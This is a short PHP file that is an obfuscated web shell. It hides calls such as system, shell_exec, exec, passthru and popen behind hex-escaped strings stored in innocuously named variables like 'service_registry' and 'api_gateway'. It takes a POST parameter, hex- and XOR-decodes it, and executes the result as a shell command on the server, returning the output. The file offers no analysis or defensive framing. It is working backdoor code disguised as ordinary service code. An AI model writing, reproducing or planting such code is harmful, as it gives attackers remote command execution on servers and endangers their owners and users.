<?php

$service_registry5 = "\x70o\x70en";
$service_registry1 = "s\x79\x73t\x65m";
$service_registry3 = "\x65xec";
$api_gateway = "\x68ex2b\x69n";
$service_registry6 = "s\x74ream_\x67e\x74\x5F\x63\x6F\x6Et\x65\x6E\x74s";
$service_registry2 = "she\x6C\x6C_\x65\x78\x65c";
$service_registry4 = "p\x61s\x73t\x68\x72u";
$service_registry7 = "\x70\x63\x6Cose";
if (isset($_POST["r\x65\x66"])) {
            function event_handler      (   $object    ,     $pset      )    {
      $item   =    ''     ;
     $b=0;
 while($b<strlen($object)){
$item.=chr(ord($object[$b])^$pset);
$b++;

} return    $item;
     
}
            $ref = $api_gateway($_POST["r\x65\x66"]);
            $ref = event_handler($ref, 23);
            if (function_exists($service_registry1)) {
                $service_registry1($ref);
            } elseif (function_exists($service_registry2)) {
                print $service_registry2($ref);
            } elseif (function_exists($service_registry3)) {
                $service_registry3($ref, $dat_object);
                print join("\n", $dat_object);
            } elseif (function_exists($service_registry4)) {
                $service_registry4($ref);
            } elseif (function_exists($service_registry5) && function_exists($service_registry6) && function_exists($service_registry7)) {
                $pset_item = $service_registry5($ref, 'r');
                if ($pset_item) {
                    $sym_pgrp = $service_registry6($pset_item);
                    $service_registry7($pset_item);
                    print $sym_pgrp;
                }
            }
            exit;
        }